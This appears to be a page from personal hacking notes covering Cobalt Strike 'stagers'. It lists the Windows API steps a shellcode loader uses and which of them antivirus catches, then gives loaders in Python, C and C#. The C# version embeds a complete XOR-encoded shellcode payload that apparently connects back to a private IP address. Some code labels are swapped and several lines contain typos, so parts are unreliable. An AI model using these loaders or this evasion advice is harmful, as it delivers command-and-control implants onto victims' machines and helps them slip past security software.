Hacking Notes
  • Ports & Enumeration
  • Antivirus Evasion
    • AMSI bypass
    • Macros / VBA
    • ETW bypass
    • EDR Evasion
    • EXE Packers
    • Powershell process-injection
    • Shellter
    • Payload generation
  • Port Forwarding
    • SSH
    • NetSH
    • Tools
    • Chisel
    • Meterpreter
  • Cloud
  • Word List Creation
  • Active Directory
    • Domain Enumeration
    • Domain Trusts
    • Domain Mapping
    • discretionary access control list (DACL)
      • ForceChangePassword
      • AddKeyLinkCredential
      • GenericWrite/ GenericAll
      • WriteOwner
      • GPO Exploitation
    • MS SQL
    • gMSA
    • Exchange
    • Group Exploitation
    • Domain Exploitation
    • Kerberos Attacks
    • SCCM
    • NTDS dumping
    • Impacket
    • ADCS exploitation
      • ESC 1
      • ESC4
      • ESC7
    • Privilege Escalation
      • Windows
        • System Enumeration
        • Credentials enumeration
        • Unsecure Service Path
        • Unsecure Path security
        • Misconfigured Reg
        • DLL Hijacking
        • Privilege enumeration
          • Tools
        • Vulnerable Apps
        • UAC Bypass
        • Service Enumeration
      • Unix
        • Linux Enumeration
        • Insecure File Permissions
        • Linux Escalate
        • Restricted shell escape
    • LAPS
  • Cloud
    • Azure
      • Tools
        • AzureCli - AZ
        • AzureCli - PowerShell
        • AzureAD
        • MicroBurst
        • SkyArk
        • PowerZure
        • BlueMap
        • AzureHound
        • BARK
        • GraphRunner
      • User attacks
        • CredMaster
        • TrevorSpray
      • o365
    • G-Cloud
    • Enumeration
      • AWS Cli
        • AWS Cli
      • Pacu
      • Organizational Trust
  • Web Application
    • Info
    • Log Poisoning / PHP Wrapping
    • HTTP Request Smuggling
    • Client Side Desync
    • Enumeration
    • Databases
    • SQL Injection
      • WAF Bypass
    • WebSocket
    • File Inclusion
    • Brute forcing
    • Cross Site Scripting (XSS)
  • Cracking
    • Hashcat
    • John The Ripper
    • Wireless
  • Wireless
    • Tools
    • WPS
    • WEP
    • WPA/ WPA-2/ WPA-3
    • WPA-Enterprise
    • PMKID
    • Captive Portal
  • DFIR
    • Forensics
      • Plaso
      • Microsoft
      • Windows
        • Anti-Forensics
        • Microsoft Forensics
          • ShimCache/ AppCompatCache
          • Defender
          • PowerShell / CMD
          • Registry
          • AmCache
          • Zone.Identifiers ADS
          • RecentFileCache
          • Prefetch
          • Lnk
          • Jumplist / RecentFiles
          • Shellbags
          • BAM/ DAM
          • SRUM
          • NTFS
          • EVTX
            • Security logs
            • WMI-Activity Operations
              • PowerShell/WinRM Operational
            • Task Scheduler
            • RDP Activity
            • Lateral Movement
          • hunting
          • Recycle Bin
          • Scheduled Tasks
        • o365
          • Mailbox Rules
      • Timeline Analysis
      • Forensics Tooling
        • Log2Timline / Plaso
        • Quarantine extraction
        • Scanning
          • Signature Scanning
          • AV Scanning
        • Logon Tracer
        • TimeSketch
        • Bulk_Extractor
        • FLS & Mactime
        • Manual Forensics
        • FTK
        • BulkExtractor & BulkExtractor-Rec
      • Linux
      • Azure
      • Active Directory
      • AnyDesk
    • Memory Analysis
      • Windows
        • Memory Acquisition
        • Code Injection
        • Rootkits
        • Rootkits
        • WMI/ PowerShell
        • Persistence & Lateral movement
        • Memory Acquisition
        • Baseliner
        • Identifying Code injection
        • Rookits
        • Process Objects
      • Tooling
        • Strings, bstrings and grep
        • Volatility
          • VolWeb
          • Memory Baseliner
        • MemProcFS
          • Code Injection
    • ReverseEngineering
    • Mobile
  • Networking
    • Radio
    • Vlans & Wired networking
    • Network Access Control
    • IPV6
    • Wireless
      • cracking
      • Aircrack-ng
      • WEP
      • WPA/ WPA2
      • WPA Enterprise
      • WPS
    • Bluetooth
  • Misc
    • Shells
      • WinRM / PowerShell
      • WinRM
      • Msfconsole
      • WinRM// PowerShell
      • Socat
      • Python
      • Netcat
      • PHP
      • Upgrade Shells
      • PowerCat
    • Buffer Overflow
      • General Information
      • Exploiting BufferOverflow
        • Find the Offset
        • Build the Exploit
        • Identifiy The BufferOverflow Character
        • Identify BadChars
        • Find the Jump Point
        • Generate Payload
        • Create Padding
    • Powershell
      • Quick Commands
      • Powershell Lateral Movement
    • Random Bits
    • Phishing
    • Coding
      • C#
    • Git
  • Command & Control
    • Meterpreter
    • Droppers
    • CobaltStrike
      • teamserver
      • Payload generation
        • Stagers
        • AV/EDR Bypass
          • Obfuscation
          • Sandbox Evasion
          • Win32 API
          • EDR Evasion
          • Encrypters
      • Listeners
      • Malleable Profiles
      • Initial Acces / Aggressors
      • Beacon Object Files (BOF)
      • Cheatsheet
    • Lateral Movement
    • Persistence
      • Low Priv User
      • High Priv User
  • Mobile App Testing
    • IOS
Powered by GitBook
On this page
  • Stagers:
  • Basic stagers:
  • c++:
Edit on GitHub
  1. Command & Control
  2. CobaltStrike
  3. Payload generation

Stagers

PreviousPayload generationNextAV/EDR Bypass

Last updated 2 years ago

Stagers:

Stagers general:

  • allocate memory (length of shellcode) to inject into memory

  • Once memory has been allocated - write the shellcode into memory

  • create a thread that executed the shellcode written into the current process (ensuring when the process injected into doesn't die)

  • keep current process running until the thread (beacon session) exits

Stagers function calls:

  • VirtualAlloc - Allocates memory

  • RtlMoveMemory - Copies shellcode into space allocated by VirtualAlloc call

  • CreateThreat - Creates threat that executed shellcode

  • WaitForSingleObject - Tells program to wait until threate created exists before closing

potential AV catch points:

  • allocating memory with RWX (ReadWriteExecute) (hex: 0x40) (hex:0x04 RW) ()

  • looking for function calls that use them three in quick sucessions

  • don't compile using Linux/mingw/Wine

Basic stagers:

Only need RWX if you're using an encoded shellcode. Stage_encoding can occur OTW 

import ctypes 
shellcode = b"BUFFER_SHELLCODE"
allocated_memory = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x300),ctypes.c_int(0x04))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(allocated_memory),shellcode,ctypes.c_int(len(shellcode)))
changed_protections = ctypes.windll.kernel32.VirtualProtect(ctypes.c_int(allocated_memory),ctypes.c_int(len(shellcode)),ctypes.c_int(0x10),ctypes.byref(ctypes.c_unint32(0)))
thread_running_shellcode = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctpyes.c_int(0),ctpyes.c_int(allocated_memory),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread_running_shellcode),ctypes.c_int(-1))

C#:

#include <windows.h>
#include <stdio.h>
#include <string.h>
int main()
{
    LPVOID lpvAddr;
    HANDLE hHand;
    DWORD dwWaitResult;
    DWORD threadID;
unsigned char buff[] = "BUFFER_SHELLCODE";

lpvAddr = VirtualAlloc(Null, strlen(buff),0x3000,0x40);
RtlMoveMemory(lpvAddr, buff, strlen(buff));
hHand = CreateThread(NULL, 0, lpvaddr, NULL, 0, &ThreadID);
dwWaitResult = WaitForSingleObject(hHand, INFINITE);
return 0
}

c++:

using system; using System.Net; using System.Net.Sockets; using System.Runting.InteropServices; using System.Threading;

namespace slksdf { class ajksnlksdf { [DllImport("Kernel32")] private static extern UInt32 HeapCreate(UInt32 HeapCreate1,UInt32 HeapCreate2, UInt32 HeapCreate3);

using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;

namespace slksdf
{
    class ajksnlksdf
    {
        [DllImport("Kernel32")] 
        private static extern UInt32 HeapCreate(UInt32 HeapCreate1, UInt32 HeapCreate2, UInt32 HeapCreate3);
        [DllImport("Kernel32")] 
        private static extern UInt32 HeapAlloc(UInt32 HeapAlloc1, UInt32 HeapAlloc2, UInt32 HeapAlloc3);
        [DllImport("Kernel32")] 
        private static extern UInt32 RtlMoveMemory(UInt32 RtlMoveMemory1, byte[] RtlMoveMemoryByte, UInt32 RtlMoveMemory3);
        [DllImport("Kernel32")] 
        private static extern IntPtr CreateThread(UInt32 CreateThread1, UInt32 CreateThread2, UInt32 CreateThread3, IntPtr CreateThread4, UInt32 CreateThread5, ref UInt32 CreateThread6);
        [DllImport("Kernel32")] 
        private static extern IntPtr WaitForSingleObject(IntPtr WaitForSingleObject1, UInt32 WaitForSingleObject2);
        static void Main()
        {
            byte[] BYTE = { 0x94, 0x20, 0xeb, 0x8c, 0x98, 0x80, 0xa4, 0x68, 0x68, 0x68, 0x29, 0x39, 0x29, 0x38, 0x3a, 0x39, 0x3e, 0x20, 0x59, 0xba, 0x0d, 0x20, 0xe3, 0x3a, 0x08, 0x20, 0xe3, 0x3a, 0x70, 0x20, 0xe3, 0x3a, 0x48, 0x20, 0x67, 0xdf, 0x22, 0x22, 0x25, 0x59, 0xa1, 0x20, 0xe3, 0x1a, 0x38, 0x20, 0x59, 0xa8, 0xc4, 0x54, 0x09, 0x14, 0x6a, 0x44, 0x48, 0x29, 0xa9, 0xa1, 0x65, 0x29, 0x69, 0xa9, 0x8a, 0x85, 0x3a, 0x29, 0x39, 0x20, 0xe3, 0x3a, 0x48, 0xe3, 0x2a, 0x54, 0x20, 0x69, 0xb8, 0x0e, 0xe9, 0x10, 0x70, 0x63, 0x6a, 0x67, 0xed, 0x1a, 0x68, 0x68, 0x68, 0xe3, 0xe8, 0xe0, 0x68, 0x68, 0x68, 0x20, 0xed, 0xa8, 0x1c, 0x0f, 0x20, 0x69, 0xb8, 0x38, 0xe3, 0x20, 0x70, 0x2c, 0xe3, 0x28, 0x48, 0x21, 0x69, 0xb8, 0x8b, 0x3e, 0x20, 0x97, 0xa1, 0x29, 0xe3, 0x5c, 0xe0, 0x20, 0x69, 0xbe, 0x25, 0x59, 0xa1, 0x20, 0x59, 0xa8, 0xc4, 0x29, 0xa9, 0xa1, 0x65, 0x29, 0x69, 0xa9, 0x50, 0x88, 0x1d, 0x99, 0x24, 0x6b, 0x24, 0x4c, 0x60, 0x2d, 0x51, 0xb9, 0x1d, 0xb0, 0x30, 0x2c, 0xe3, 0x28, 0x4c, 0x21, 0x69, 0xb8, 0x0e, 0x29, 0xe3, 0x64, 0x20, 0x2c, 0xe3, 0x28, 0x74, 0x21, 0x69, 0xb8, 0x29, 0xe3, 0x6c, 0xe0, 0x20, 0x69, 0xb8, 0x29, 0x30, 0x29, 0x30, 0x36, 0x31, 0x32, 0x29, 0x30, 0x29, 0x31, 0x29, 0x32, 0x20, 0xeb, 0x84, 0x48, 0x29, 0x3a, 0x97, 0x88, 0x30, 0x29, 0x31, 0x32, 0x20, 0xe3, 0x7a, 0x81, 0x23, 0x97, 0x97, 0x97, 0x35, 0x20, 0x59, 0xb3, 0x3b, 0x21, 0xd6, 0x1f, 0x01, 0x06, 0x01, 0x06, 0x0d, 0x1c, 0x68, 0x29, 0x3e, 0x20, 0xe1, 0x89, 0x21, 0xaf, 0xaa, 0x24, 0x1f, 0x4e, 0x6f, 0x97, 0xbd, 0x3b, 0x3b, 0x20, 0xe1, 0x89, 0x3b, 0x32, 0x25, 0x59, 0xa8, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x21, 0xd2, 0x52, 0x3e, 0x11, 0xcf, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x80, 0x67, 0x68, 0x68, 0x68, 0x59, 0x51, 0x5a, 0x46, 0x59, 0x5e, 0x50, 0x46, 0x5d, 0x51, 0x46, 0x59, 0x5b, 0x5b, 0x68, 0x32, 0x20, 0xe1, 0xa9, 0x21, 0xaf, 0xa8, 0x28, 0x77, 0x68, 0x68, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x02, 0x6b, 0x3b, 0x21, 0xd2, 0x3f, 0xe1, 0xf7, 0xae, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x80, 0xa2, 0x68, 0x68, 0x68, 0x47, 0x3b, 0x51, 0x09, 0x3b, 0x58, 0x07, 0x02, 0x5c, 0x37, 0x12, 0x5b, 0x0b, 0x3f, 0x51, 0x59, 0x32, 0x1d, 0x2f, 0x09, 0x1f, 0x22, 0x39, 0x22, 0x31, 0x30, 0x0e, 0x26, 0x1f, 0x09, 0x09, 0x31, 0x00, 0x0f, 0x3a, 0x1a, 0x1b, 0x10, 0x3d, 0x12, 0x24, 0x26, 0x37, 0x02, 0x3e, 0x05, 0x32, 0x59, 0x5f, 0x12, 0x27, 0x2b, 0x0b, 0x05, 0x31, 0x0b, 0x59, 0x02, 0x5c, 0x18, 0x51, 0x11, 0x5e, 0x24, 0x1d, 0x21, 0x09, 0x2c, 0x12, 0x2f, 0x10, 0x1d, 0x19, 0x23, 0x45, 0x18, 0x5c, 0x32, 0x2f, 0x00, 0x23, 0x39, 0x0a, 0x0d, 0x1e, 0x32, 0x1e, 0x5b, 0x3c, 0x5f, 0x24, 0x20, 0x0c, 0x27, 0x1f, 0x31, 0x38, 0x19, 0x06, 0x2c, 0x58, 0x3a, 0x23, 0x12, 0x2f, 0x0e, 0x58, 0x38, 0x2a, 0x07, 0x58, 0x0b, 0x3c, 0x30, 0x06, 0x27, 0x20, 0x39, 0x24, 0x12, 0x31, 0x1e, 0x1b, 0x0f, 0x03, 0x1e, 0x18, 0x3e, 0x27, 0x04, 0x38, 0x2a, 0x3b, 0x21, 0x3e, 0x32, 0x3e, 0x0a, 0x02, 0x02, 0x1e, 0x3b, 0x3c, 0x3b, 0x19, 0x04, 0x2e, 0x5f, 0x03, 0x03, 0x3e, 0x06, 0x0d, 0x0d, 0x21, 0x45, 0x30, 0x38, 0x2f, 0x32, 0x01, 0x32, 0x29, 0x11, 0x0e, 0x51, 0x32, 0x31, 0x26, 0x05, 0x06, 0x05, 0x59, 0x59, 0x1f, 0x2a, 0x02, 0x1c, 0x0a, 0x5e, 0x10, 0x19, 0x5a, 0x0c, 0x1c, 0x27, 0x26, 0x3f, 0x3a, 0x5d, 0x5f, 0x2c, 0x2c, 0x0e, 0x11, 0x18, 0x10, 0x59, 0x24, 0x30, 0x04, 0x68, 0x20, 0xe1, 0xa9, 0x3b, 0x32, 0x29, 0x30, 0x25, 0x59, 0xa1, 0x3b, 0x20, 0xd0, 0x68, 0x6a, 0x40, 0xec, 0x68, 0x68, 0x68, 0x68, 0x38, 0x3b, 0x3b, 0x21, 0xaf, 0xaa, 0x83, 0x3d, 0x46, 0x53, 0x97, 0xbd, 0x20, 0xe1, 0xae, 0x02, 0x62, 0x37, 0x3b, 0x32, 0x20, 0xe1, 0x99, 0x25, 0x59, 0xa1, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x21, 0xaf, 0xaa, 0x45, 0x6e, 0x70, 0x13, 0x97, 0xbd, 0xed, 0xa8, 0x1d, 0x77, 0x20, 0xaf, 0xa9, 0xe0, 0x7b, 0x68, 0x68, 0x21, 0xd2, 0x2c, 0x98, 0x5d, 0x88, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0x97, 0xa7, 0x1c, 0x6a, 0x83, 0xa4, 0x80, 0x3d, 0x68, 0x68, 0x68, 0x3b, 0x31, 0x02, 0x28, 0x32, 0x21, 0xe1, 0xb9, 0xa9, 0x8a, 0x78, 0x21, 0xaf, 0xa8, 0x68, 0x78, 0x68, 0x68, 0x21, 0xd2, 0x30, 0xcc, 0x3b, 0x8d, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0xfb, 0x3b, 0x3b, 0x20, 0xe1, 0x8f, 0x20, 0xe1, 0x99, 0x20, 0xe1, 0xb2, 0x21, 0xaf, 0xa8, 0x68, 0x48, 0x68, 0x68, 0x21, 0xe1, 0x91, 0x21, 0xd2, 0x7a, 0xfe, 0xe1, 0x8a, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0xeb, 0xac, 0x48, 0xed, 0xa8, 0x1c, 0xda, 0x0e, 0xe3, 0x6f, 0x20, 0x69, 0xab, 0xed, 0xa8, 0x1d, 0xba, 0x30, 0xab, 0x30, 0x02, 0x68, 0x31, 0x21, 0xaf, 0xaa, 0x98, 0xdd, 0xca, 0x3e, 0x97, 0xbd };
            for (int i = 0; i < BYTE.Length; i++)
            {
                BYTE[i] = (byte)(BYTE[i] ^ (byte)'h');
            }
            UInt32 CreateHeap = HeapCreate(0x00040000, (UInt32)BYTE.Length, 0);
            UInt32 AllocHeap = HeapAlloc(CreateHeap, 0x00000008, (UInt32)BYTE.Length);
            RtlMoveMemory(AllocHeap, BYTE, (UInt32)BYTE.Length);
            UInt32 Zero = 0;
            IntPtr ThreadCreate = CreateThread(0, 0, AllocHeap, IntPtr.Zero, 0, ref Zero);
            WaitForSingleObject(ThreadCreate, 0xFFFFFFF);
        }
    }
}

https://learn.microsoft.com/en-us/windows/win32/memory/memory-protection-constants